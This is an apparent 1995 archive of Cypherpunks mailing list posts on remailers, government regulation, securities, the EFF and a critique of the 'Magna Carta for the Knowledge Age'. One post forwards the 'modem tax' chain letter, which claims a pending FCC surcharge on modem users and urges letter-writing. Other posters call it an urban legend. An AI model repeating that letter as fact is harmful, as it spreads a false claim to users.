Message-ID: <X1c9lKJXYrxI078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> 	c2.org, of course, welcomes remailers.

Care to provide some details?

Thanks, Don

- --
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyZglGvyi8p8VUiJAQGABQQAyvOwQSGaTd4d0FS6QmY9qfsGJnYd/+Mb
ZwVbQh31QVnpkYD9kN3DLpcqjzsp+G0UHGhaDShGBqGWlTeBAmt+J3JeDxYxTyOM
s2fgEkJlwrzNuATFHDvscAeMq8GlvU87J6BeBzo1sDRKyo9VIm3PWvPQO9oEwxh3
d7NjuuCs37w=
=xtiZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Wed, 25 Jan 95 07:39:03 PST
To: cypherpunks@toad.com
Subject: data charge
Message-ID: <v01510102ab4c13015e0e@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


This came to the machttp_talk list and though it was appropriate here:
******************************
>>Subject: Modem Use Fees
>
>Here is some info that was forwarded to me that all Arts Mgt
>List readers will find interesting. Please act accordingly. Thanks!
>
>Two years ago the FCC tried and (with your help and letters of
>protest) failed to institute regulations that would impose
>additional costs on modem users for data communications. Now,
>they are at it again. A new regulation that the FCC is quietly
>working on will directly affect you as the user of a computer and
>modem. The FCC proposes that users of modems should pay extra
>charges for use of the public telephone network which carry their
>data. In addition, computer network services such as CompuServ,
>Tymnet, & Telenet would also be charged as much as $6.00 per hour
>per user for use of the public telephone network. These charges
>would very likely be passed on to the subscribers. The money is
>to be collected and given to the telephone company in an effort
>to raise funds lost to deregulation.  Jim Eason of KGO newstalk
>radio (San Francisco, CA) commented on the proposal during his
>afternoon radio program during which, he said he learned of the
>new regulation in an article in the New York Times. Jim took the
>time to gather addresses which are given below.
>
>
>Here's what you should do (NOW!):
>
>1-Pass this information on. Capture the information which
>contains the text you are reading now. Find other BBS's that are
>not carrying this  information. Upload the ASCII text into public
>message on the  BBS, and  also upload the file itself so others
>can easily get a copy to pass along.
>
>2-Print out three copies of the letter which follows (or write
>yours down) and send a signed copy to each of the following:
>
>       Chairman of the FCC
>       1919 M Street N.W.
>       Washington, D.C. 20554
>
>       Chairman, Senate Communication Subcommittee
>       SH-227 Hart Building
>       Washington, D.C. 20510
>
>       Chairman, House Telecommunication Subcommittee
>       B-331 Rayburn Building
>
>Here's the suggested text of the letter to send:
>
>Dear Sir:
>
>Please allow me to express my displeasure with the FCC
>proposal which would authorize a surcharge for the use of modems
>on the telephone network. This regulation is nothing less than an
>attempt to restrict the free exchange of information among the
>growing number of computer users. Calls placed using modems
>require no special telephone equipment, and users of modems pay
>the phone company for use of the network in the form of a monthly
>bill.
>
>In short, a modem call is the same as a voice call and
>therefore should not be subject to any additional regulation.
>
>       Sincerely,
>
>
>                              ***************
>
>It is important that you act now. The bureaucrats already have
>it in their heads that modem users should subsidize the phone
>company and are now listening to public comment. Please stand up
>and make it clear that we will not stand for any government
>restriction on the free exchange of information.
>
>Please deal with this in a TIMELY manner. We can't wait and
>watch, or we will be walked over by government regulations that
>are trying to strangle us.
>
>
>Kirk deFord, Regional Telementor
>Region I
>The California Arts Project
>@ Casa Grande High School
>333 Casa Grande Road, Petaluma, CA 94953
>707.778-4677 (leave message) or at home: 707.769-8653  :%)
>kdeford@ctp.org
>
>
>
>*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
>*-  spiro(s) antonopoulos      + Please Note New Email Address -*
>*-  souljerky research         +      spiros@rtoads.com        -*
>*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
>

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's February 8th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Wed, 25 Jan 95 07:07:42 PST
To: cypherpunks@toad.com (Cypher Punks)
Subject: Re: The Remailer Crisis
In-Reply-To: <X1c9lKJXYrxI078yn@ssnet.com>
Message-ID: <9501251504.AA22587@marlin.ssnet.com>
MIME-Version: 1.0
Content-Type: text


Apologies to the list...mailer put in a cc: I didn't notice.

> > 	c2.org, of course, welcomes remailers.
> 
> Care to provide some details?

-- 
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rparratt@london.micrognosis.com (Richard Parratt)
Date: Wed, 25 Jan 95 02:12:40 PST
To: jamesd@netcom.com
Subject: Re: Clinton freezes U.S. assets of Mideast groups
Message-ID: <9501251010.AA03760@pero>
MIME-Version: 1.0
Content-Type: text/plain


> The Eurodollar market got started because Russia feared 
> arbitrary confiscation of its dollar bank accounts.

Not actually true. It was because US banks were
subject to statutory limits on the amount of interest
they could pay on dollar deposits.

> At present it seems to me that unix machines on the internet
> are intrinsicly insecure -- the methods used to secure them
> are a collection of ad hoc patches.  For example all
> unix machines are vulnerable to the trojan
> horse attack.

Banks are intrinsically insecure. All banks are subject to
the "sawn-off shotgun" attack, also the "kidnap the
managers family" attack and several others.

> Windows NT is supposedly secure.  Certainly its design makes
> it possible to write software that is intrinsicly secure,

Why do you think that? Certainly it's compartmentalism
is better than UNIX, and as a "ground-up" design it's
probably seen better QA than UNIX. However, it hasn't had
20 years of interest from hackers and others. Also, while
the NT kernel may be *better*, several subsystems have
all the problems of UNIX, e.g. TCP/IP and the sequence
number attack.

I like NT, but it will never be a security panacea.

--
Richard Parratt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 25 Jan 95 08:02:21 PST
To: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Subject: Re: data charge
In-Reply-To: <v01510102ab4c13015e0e@[152.97.12.101]>
Message-ID: <9501251601.AA15109@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Oh no! The modem tax urban legend comes around again!

.pm

Rhys Kyraden says:
> This came to the machttp_talk list and though it was appropriate here:
> ******************************
> >>Subject: Modem Use Fees
> >
> >Here is some info that was forwarded to me that all Arts Mgt
> >List readers will find interesting. Please act accordingly. Thanks!
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 25 Jan 95 11:14:47 PST
To: Charles Bell <quester@eskimo.com>
Subject: Re: LOCKSMITH'S GUILD WANTS L
In-Reply-To: <Pine.SUN.3.91.950125011443.8597B-100000@eskimo.com>
Message-ID: <Pine.3.89.9501251105.A18368-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 25 Jan 1995, James A. Donald wrote:
> > While universities often issue or refrain from issuing certificates
> > for corrupt and improper reasons, government supervision on this 
> > matter is unlikely to keep them honest --- indeed it is more likely
> > to force them to be dishonest, or to force them to deny their own
> > sound judgment in favor of arbitrary and foolish criteria imposed
> > by some ignorant and arrogant bureaucrat.

On Wed, 25 Jan 1995, Charles Bell wrote:
> So....once we get past what seems to be your utter refusal to consider 
> the possibility that government could ever do anything right ....how do 
> we ensure that those skyscrapers don't fall down on us?  That the surgeon 
> who is going to open me up knows something about surgery?  That my money 
> is at least somewhat safe in the bank?

Why, we have the credentials and audits of these organizations and
individuals checked by a being of godlike wisdom far superior
to that of us ordinary mortals -- namely that god on earth,
the government.

What makes you assume that guns make people wise and virtuous?

Common sense and casual observation does not support this hypothesis.

I recommend you read the excellent book on free banking
sold by Laissez Faire:  I do not remember their web
site, but I have a pointer to them in my home page. (see sig)

It details the sorry tale of government supervision of banks --
which invariably had the effect of the state governments robbing
the banks, or protecting well connected crooks who robbed the
banks.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 25 Jan 95 08:29:58 PST
To: Mark Grant <mark@unicorn.com>
Subject: Re: LOCKSMITH'S GUILD WANTS L
In-Reply-To: <Pine.3.89.9501251635.A18687-0100000@unicorn.com>
Message-ID: <9501251627.AA15154@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Mark Grant says:
> 
> On Wed, 25 Jan 1995, Charles Bell wrote:
> 
> > how do
> > we ensure that those skyscrapers don't fall down on us?  That the surgeon
> > who is going to open me up knows something about surgery?  That my money
> > is at least somewhat safe in the bank?
> 
> With non-government reptutation and certification agencies.

I'll point out that insurance companies have typically taken on this
role, being at risk in these instances. "Underwriters Laboratories"
work with electrical safety is a real world example in which this
actually happened.

However, could we please take this discussion to someplace like
talk.politics.libertarian? The mere fact that I agree with the point
doesn't mean that I have an interest in seeing the only place for
cypherpunk discussion taken over by discussion of the evils of
government.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 25 Jan 95 11:49:04 PST
To: perry@imsi.com
Subject: Modem Tax!--Write to FCC Commmissioner Craig Shergold
In-Reply-To: <9501251601.AA15109@snark.imsi.com>
Message-ID: <199501251947.LAA04536@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> 
> Oh no! The modem tax urban legend comes around again!
> 


I am shocked at this proposed modem tax, along with the keyboard tax,
the printer tax, the mouse tax, and the cable tax.

FCC Commissioner Craig Shergold has asked that comment on this modem
tax be sent on post cards to him. He is hoping to receive more
postcards than any previous FCC Commissioner.

His address is:

FCC Commissioner Craig T. Shergold
Room 101
Ministry of Truth
42 Oceania Street, NW
Washington, D.C. 10666

In a related note, opponents of this modem tax are encouraged to flash
their headlights at oncoming traffic.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 25 Jan 95 09:03:34 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: e$: Guilds, Friedman, and Web-servers for mutual funds
In-Reply-To: <199501251641.IAA23018@largo.remailer.net>
Message-ID: <9501251703.AA15209@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
>    From: rah@shipwright.com (Robert Hettinga)
> 
>    You can sell anything digitable on the net.
> 
>    Securities are mostly traded on a book-entry
>    basis, that is, in IBM mainframe(still!) computer accounting systems. The
>    back offices are all automated. 
> 
> In the interest of buzzword-compliance, book entry securities in the
> USA are called ADR's -- American Depository Receipts.  ADR facilities
> are privately operated; Bank of New York has (if I'm remembering
> correctly) the single largest share of this market.

Not quite right. ADRs are receipts used to permit the trading of
*foreign* securities in American markets. The ADRs will have
properties that shield American investors from all sorts of evils like
getting warrant issues that aren't registered in the US. There is a
new breed of these things called GDRs that I've heard tell of, though
I know little about them. Bank of New York may be big in this business
-- I don't know a lot about it.

Almost all normal securities in the US can be held in book-entry form,
although most can still be physically delivered for the benefit of
nuts. The securities are depositied with the Depository Trust
Corporation, or DTC, which handles these things. (DTC has some sort of
connection to SIAC that I'm not entirely clear on; its been a long
time since I dealt with this stuff.) All securities have some sort of
certificate form, even the ones that never are able to be physically
delivered like some kinds of bonds -- this means that DTC gets to
maintain a big vault out in Long Island full of things like single
bond certificates covering an entire $500M issue and proudly stamped
all over "Non-Transferable". For some weird reason, the securities are
always held in the name of "Ceed & Co." when held this way; I don't
remember the details of why but it had something to do with compliance
with archaic laws, just as the existance of a physical certificate in
their vault does.

Japan does not do book entry at all -- there is an army of
ex-policemen on bicycles (I'm not making this up) who do delivery of
physical certificates in Tokyo.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@metronet.com (David K. Merriman)
Date: Wed, 25 Jan 95 10:14:45 PST
To: cypherpunks@toad.com
Subject: EFF Renewal response
Message-ID: <199501251814.AB01626@metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


25 January, 1995

EFF
1557 K Street, Ste. 801
Washington, DC   20006

Sirs;
	This letter is in response to your recent membership renewal reminder.

	I have elected to withdraw my membership from EFF. My reasons for this are
really quite simple: I do not believe that certain past actions of the EFF
have been to the benefit of "the electronic frontier" - so much so that I
feel I must question whether the EFF truly represents my views.

	Specifically, I am referring to the debacle of the Digital Telephony act.
While the EFF was right in opposing this legislation, I believe that it was
grievously in error to make any kind of 'compromise' with federal officials
by assisting in the wording of the Act. While the EFF's stated position was
that it considered the legislation 'inevitable', and sought to make it as
palatable as possible, I do not believe that the EFF's willingness to
cooperate was appropriate at all. The EFF's actions have been likened to a
dog that barks quite loudly at a burglar, and then rolls over to have it's
belly rubbed when offered a treat by that same burglar - a description I
find to be more appropriate than that put forward by EFF representatives
(which, incidentally, sounded quite similar to the old adage "if you're
going to be raped, you might as well lay back and enjoy it." - an attitude I
find offensive in either context).

	While the EFF's stated goal of protecting the electronic frontier and
cyberspace is quite laudable, I do not see how such protection is possible
by compromising with the political and philosophical equivalents of thieves,
brigands, rapists, and common thugs. By cooperating with federal officials,
you have granted them the sanction of legitimizing their position, rather
than holding it up as an example of the untoward intrusion and violation of
the personal rights and freedoms of the citizens of cyberspace that more
accurately described it - and you have do so for the political equivalent of
30 pieces of silver.

	You need not make any response to this letter, should you be so inclined -
EFF, with it's actions regarding the Digital Telephony bill has completely
and thoroughly 'thrown away' any trust or faith in it's position, policies,
or effeciacy that I may have once had.

Sincerely,


David K. Merriman


cc: cypherpunks mailing list
- - - - - - - - - - - - - - - - - - - - - - - - - - 
Finger merriman@fohnix.metronet.com for PGP public key and fingerprint.
PGP encrypted Email welcome, encouraged, and preferred.
"Those who make peaceful revolution impossible will make violent revolution 
inevitable."  John F. Kennedy 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@rahul.net
Date: Wed, 25 Jan 95 12:33:24 PST
To: sorr@eznet.net
Subject: Re: Identity
Message-ID: <199501252027.AA15453@bolero.rahul.net>
MIME-Version: 1.0
Content-Type: text/plain


sorr@eznet.net wrote:

> To whomever:
>   I'm a reporter at the daily newspapers in Rochester, N.Y., researching a 
> story on the recent spate of IP-spoof hack events. Supposedly a toad.com 
> address was used by a person who broke into the San Diego supercomputer center 
> a month ago. What's toad.com? I got your name from a web search that found an 
> old communique.
>   Can you be any help? I'm simply trying to reconstruct what happened.
> Steve Orr
> Gannett Rochester Newspapers

Fuck Gannett.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <samman@CS.YALE.EDU>
Date: Wed, 25 Jan 95 09:42:11 PST
To: cypherpunks@toad.com
Subject: LAw in Cyberspace
Message-ID: <Pine.SUN.3.91.950125124043.5213A-100000@jaguar.zoo.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


Well, Yale Law School is offering a class this semester on Law in 
Cyberspace.  I'm going to audit it, and when I get a syllabus(tomorrow), 
I'll post a copy if folks are intersted.

Just thought it would be of general interest.

Ben

----
"By the end of 1648 all was over.  Cromwell was Dictator.  The Royalists 
were crushed; Parliament was a tool;  the Constitution was a figment; the 
Scots rebuffed, the Welsh back in their mountains; the Fleet was 
reorganised, London overawed.  King Charles, at Carisbrooke Castle, where 
the donkey treads the water wheel, was left to pay the bill.  It was mortal."
			--Winston Churchill
			--_History_of_English_Speaking_Peoples Vol. II





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Tue, 24 Jan 95 18:36:49 PST
To: cypherpunks@toad.com
Subject: Re: Here's what will happen to U.S. based remailers
In-Reply-To: <Pine.SV4.3.91.950124161239.1512A-100000@mirage.skypoint.com>
Message-ID: <Pine.SUN.3.91.950125124538.10006K-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Jan 1995, Samuel Kaplin wrote:

> Is this the poem, Lucky?

Not quite.  It's this one:

	First they came for the communists,
	and I did not speak out, for I was not one;
	They came for the Jews,
	and I was silent because I was not a Jew;
	They came for the Trade Unionists,
	and I did not protest, because I did not belong to a trade union;
	They came for the Catholics,
	and I said nothing because I was not a Catholic;
	And then they came for me.
	There was no one left to say anything...

	Rev Martin Niemoeller, 1945

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Tue, 24 Jan 95 18:35:04 PST
To: cypherpunks@toad.com
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <Pine.3.89.9501241122.A12422-0100000@netcom10>
Message-ID: <Pine.SUN.3.91.950125124718.10006L-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Jan 1995, James A. Donald wrote:

> For example all unix machines are vulnerable to the trojan horse attack.

Ah, which one would this be?

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mo Baxter <morpheus@math.whitman.edu>
Date: Wed, 25 Jan 95 12:53:16 PST
To: Matthew Ghio <ghio@myriad.pc.cc.cmu.edu>
Subject: Starting a remailer
Message-ID: <Pine.SOL.3.91.950125121853.5452A-100000@calvin>
MIME-Version: 1.0
Content-Type: text/plain


I need info on what's needed to operate a secure remailer out of an edu
address.  I'd appreciate anything on programs, installation, maintenance,
problems, etc... 

Thanks,
	Mo

		"We're all in it together."
				--Harry Tuttle 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 25 Jan 95 10:00:54 PST
To: cypherpunks@toad.com
Subject: NYT on USG Threats
Message-ID: <199501251800.NAA02070@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
   The New York Times 
   January 25, 1995, p. A9. 
 
   [Excerpts] 
 
   Clinton Orders Assets of Suspected Terrorist Groups Frozen 
 
 
   By Douglas Jehl 
 
 
   Washington, Jan. 24 -- Seeking to underscore an American 
   commitment to the fight against terrorism, President 
   Clinton today issued an executive order intended to cut off 
   the flow of funds from United States citizens to 
   organizations suspected of terrorist activities in Israel 
   and other countries. 
 
 
   Mr. Clinton's directive orders American financial 
   institutions to search for and immediately freeze any 
   accounts held in the names of Hamas, Islamic Holy War and 
   10 other organizations, and 18 of their top leaders. 
 
 
   It also forbids financial transfers from the United States 
   to those groups and individuals and will seek to prevent 
   them from gaining access to donations made to charitable 
   causes in the Middle East. 
 
 
   Administration officials said it was too soon to know 
   whether any assets would be uncovered. 
 
 
   While today's announcement at the White House emerged from 
   an Administration review concluding that the United States 
   could do more to limit terrorists' access to money, aides 
   to Mr. Clinton acknowledged that the timing had been 
   largely dictated by the quest for a tough-worded 
   centerpiece to the State of the Union address. 
 
 
   The aides said Mr. Clinton intended to use the speech in 
   part to demonstrate his commitment to preserving foreign 
   policy gains in the Middle East against those who would 
   scuttle peace efforts. 
 
 
   Even if the groups identified today do not hold accounts in 
   their names, the officials said the directive could give 
   the Government more power to block and deter transfers to 
   them -- even when those are disguised as contributions to 
   charity. 
 
 
   "It is not foolprooof," a senior Administration official 
   said at a White House briefing this afternoon. "It is 
   capable of being circumvented through a variety of 
   strategems." But another official said the measures could 
   "essentially sever the lifeline that keeps these 
   organizations going." 
 
   *** 
 
   A statement issued by three major American Islamic 
   organizations warned that the initiative could "have a 
   negative impact on legitimate political expression by 
   American Muslims and others." 
 
 
   But advocates of the plan said it represented no more than 
   a first step, even though Administration officials said 
   they would need to see further evidence that charitable 
   contributions were being used to support terrorist 
   operations before the Government would seek to block 
   operations by Muslim and Islamic groups active in raising 
   money in the United States. 
 
 
   Administration officials say that much of that money is 
   used for legitimate purposes in building mosques, providing 
   food and milk and otherwise helping Palestinian communities 
   like the ones in Gaza and the occupied West Bank. 
 
 
   But State Department officials have said that millions of 
   dollars a year from the United States ends up in the hands 
   of militants in the Hamas organizatlon, whose total 
   spending is estlmated by Israeli officlals at $30 million 
   a year and they said a test of the initiative would be 
   whether it could cut back that flow. 
 
 
   For now, the names of groups and individuals whose assets 
   are to be frozen or blocked unaer Mr. Clinton's order reads 
   like a who's who list of organzations and people identified 
   as terrorists. 
 
 
   In addition to Hamas and Islamic Holy War, they include the 
   Palestine Liberation Front and its leader, Mohammed Abul 
   Abbas -- also known as Abu Abbas --  as well as the two 
   rival factions of the Popular Front for the Liberation of 
   Palestine. 
 
 
   The list also includes two militant Jewish organizations, 
   Kach and Kahane Chai, which were spawned by Rabbi Meir 
   Kahane and were outlawed by Israel early last year. 
 
 
   The authority that Mr. Clinton invoked today in blocking 
   the assets is provided to the President under the 
   International Emergency Economic Powers Act, which was used 
   by President Carter to freeze Iranian assets when Americans 
   were being held hostage in Teheran. 
 
 
   But the White House made clear that Mr. Clinton intended to 
   ask Congress soon for even more sweeping authority to curb 
   terrorism, including wider powers to use wiretapping and 
   swift deportation procedures against suspects. 
 
 
   ---------- 
   End 
 
 
 
   The New York Times 
   January 25, 1995, p. B6. 
 
 
   Head of the F.B.I.In New York Resigns 
 
 
   After a year as the head of the Federal Bureau of 
   Investigation's New York office, William A. Gavin said 
   yesterday that he was leaving for an executive post with a 
   medical-care company. 
 
 
   Mr. Gavin, 53, said he would retire in March as a deputy 
   assistant F.B.I. director to join U.S. Healthcare, in Blue 
   Bell, Pa, one of the country's largest health maintenance 
   organizations. The F.B.I. has a mandatory retirement age of 
   57. 
 
 
   Last January, Louis J. Freeh, the F.B.I. director, named 
   Mr. Gavin to run the office at an annual salary of 
   $130,000. But he was not promoted to the title of assistant 
   director, the rank normally given to the agency's top 
   manager in New York, one of the agency's most prestigious 
   assignments. 
 
 
   An agent and supervisor for 27 years, Mr. Gavin was in 
   charge of the investigations that led to the convictions of 
   four men for the 1993 bombing of the World Trade Center and 
   the indictments of 12 other men accused of plotting to blow 
   up the trade center and other New York Iandmarks. The 12 
   defendants are currently on trial in Federal District Court 
   in Manhattan. 
 
 
   Law-enforcement officials said yesterday that James 
   Kallstrom, a supervisory agent in New York, was considered 
   the most likely candidate to be chosen by Mr. Freeh to take 
   over the office. Mr. Kallstrom is now in charge of special 
   operations, the unit responsible for the surveillance and 
   the electronic monitoring of criminal suspects. 
 
 
   ---------- 
   End 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Wed, 25 Jan 95 11:54:20 PST
To: cypherpunks@toad.com
Subject: In Re: Modem Tax
Message-ID: <v01510106ab4c4e7b1d52@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


        I wanted to oh so thankfully thank all 15 of you who so calmly and
straightforwardly set me straight on this subject. I must apologize for my
dire misdeed in presenting this to the list. Maybe you could all form a
lynch mob, come on down to good ole Tennessee and beat this poor ignorant
Hillbilly to death, hang him from a tree, and burn a few crosses while your
at it.


         READ: Rude.

         Thank you.

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's February 8th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkmoore@iol.ie (Richard K. Moore)
Date: Wed, 25 Jan 95 06:00:24 PST
To: cypherpunks@toad.com
Subject: Magna Carta Analyzed (1/2)
Message-ID: <199501251358.NAA14088@GPO.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain




Detailed analysis of:

        Cyberspace and the American Dream:
        A Magna Carta for the Knowledge Age
        Release 1.2 // August 22, 1994
        Progress and Freedom Foundation
        Co-authors:
            Ms. Esther Dyson
            Mr. George Gilder
            Dr. George Keyworth
            Dr. Alvin Toffler

Analysis By:

        Richard K. Moore
        rkmoore@iol.ie
        20 January 1995


-----------------------------------------------------

This document is a condensed version of the Magna Carta (MC), with
extensive commentary.

Some sections of MC, especially the introductory material, are quoted in
entirety.

Some sections are  summarized by me, with representative passages cited.
Other sections are boiled down with ellipses to their meat. Asterisks are
used to add emphasis to the source text.


-rkm


___________________________________________________


 Cyberspace and the American Dream:
A Magna Carta for the Knowledge Age
Release 1.2 // August 22, 1994

 ----------------------------------------

This statement represents the cumulative wisdom and
innovation of many dozens of people.  It is based
primarily on the thoughts of four "co-authors":  Ms.
Esther Dyson; Mr. George Gilder; Dr. George Keyworth;
and Dr. Alvin Toffler. This release 1.2 has the final
"imprimatur" of no one.  In the spirit of the age:  It
is copyrighted solely for the purpose of preventing
someone else from doing so.  If you have it, you can
use it any way you want.  However, major passages are
from works copyrighted individually by the authors,
used here by permission; these will be duly
acknowledged in release 2.0.  It is a living document.
Release 2.0 will be released in October 1994. We hope
you'll use it is to tell us how to make it better.  Do
so by:
    -  Sending E-Mail to PFF@AOL.COM
    -  Faxing 202/484-9326 or calling 202/484-2312
    -  Sending POM (plain old mail) to 1250 H. St. NW,
       Suite 550
       Washington, DC 20005

(The Progress & Freedom Foundation is a not-for-profit
research and educational organization dedicated to
creating a positive vision of the future founded in
the historic principles of the American idea.)
 ----------------------------------------

PREAMBLE

The central event of the 20th century is the overthrow
of matter. In technology, economics, and the politics
of nations, wealth -- in the form of physical
resources -- has been losing value and significance.
The powers of mind are everywhere ascendant over the
brute force of things.
In a First Wave economy, land and farm labor are the
main "factors of production." In a Second Wave
economy, the land remains valuable while the "labor"
becomes massified around machines and larger
industries. In a Third Wave economy, the central
resource -- a single word broadly encompassing data,
information, images, symbols, culture, ideology, and
values -- is _actionable_ knowledge.

The industrial age is not fully over. In fact, classic
Second Wave sectors (oil, steel, auto-production) have
learned how to benefit from Third Wave technological
breakthroughs -- just as the First Wave's agricultural
productivity benefited exponentially from the Second
Wave's farm-mechanization.

But the Third Wave, and the _Knowledge Age_ it has
opened, will not deliver on its potential unless it
adds social and political dominance to its
accelerating technological and economic strength. This
means repealing Second Wave laws and retiring Second
Wave attitudes. It also gives to leaders of the
advanced democracies a special responsibility -- to
facilitate, hasten, and explain the transition.

As humankind explores this new "electronic frontier"
of knowledge, it must confront again the most profound
questions of how to organize itself for the common
good. The meaning of freedom, structures of self-
government, definition of *property*, nature of
*competition*, conditions for *cooperation*, sense of
community and nature of *progress* will each be
redefined for the Knowledge Age -- just as they were
redefined for a new age of industry some 250 years
ago.

What our 20th-century countrymen came to think of as
the "American dream," and what resonant thinkers
referred to as "the promise of American life" or "the
American Idea,"  emerged from the turmoil of 19th-
century industrialization. Now it's our turn: The
knowledge revolution, and the Third Wave of historical
change it powers, summon us to renew the dream and
enhance the promise.


THE NATURE OF CYBERSPACE

The Internet -- the huge (2.2 million computers),
global (135 countries), rapidly growing (10-15% a
month) network that has captured the American
imagination -- is only a tiny part of cyberspace. So
just what is cyberspace?

More ecosystem than machine, cyberspace is a
bioelectronic environment that is literally universal:
It exists everywhere there are telephone wires,
coaxial cables, fiber-optic lines or electromagnetic
waves.

This environment is "inhabited" by *knowledge*,
including incorrect ideas, existing in electronic
form. It is connected to the physical environment by
portals which *allow people to see what's inside*, to
put knowledge in, to alter it, and to take knowledge
out. Some of these portals are one-way (e.g.
television receivers and television transmitters);
others are two-way (e.g. telephones, computer modems).

[  Hey! I though *we* were the residents of
[  cyberspace, not the the electrons!
[
[  Here's where the condensation starts.
[
[  They continue building the model that cyberspace is
[  a big data world that people can access. No
[  perception of cyberspace *embodying* communities of
[  people. People are to participate as individual
[  consumer/navigator of cyberspace's resources.
[
[  Here's a representative sample of the slogan-
[  coating that colors their presentation:

...Cyberspace is the land of knowledge, and the
exploration of that land can be a civilization's
truest, highest calling. The opportunity is now before
us to empower every person to pursue that calling in
his or her own way.

The challenge is as daunting as the opportunity is
great. The Third Wave has profound implications for
the nature and meaning of property, of the
marketplace, of community and of individual freedom.
As it emerges, it shapes new codes of behavior that
move each organism and institution -- family,
neighborhood, church group, company, government,
nation -- inexorably beyond standardization and
centralization, as well as beyond the materialist's
obsession with energy, money and control.

[  Next comes the first entry of the leit-motiv:
[  "government" as the villain of the story.

It also spells the death of the central institutional
paradigm of modern life, the bureaucratic
organization. (Governments, including the American
government, are the last great redoubt of bureaucratic
power on the face of the planet, and for them the
coming change will be profound and probably
traumatic.)...

[  Corporations, as a seat of bureaucratic power,
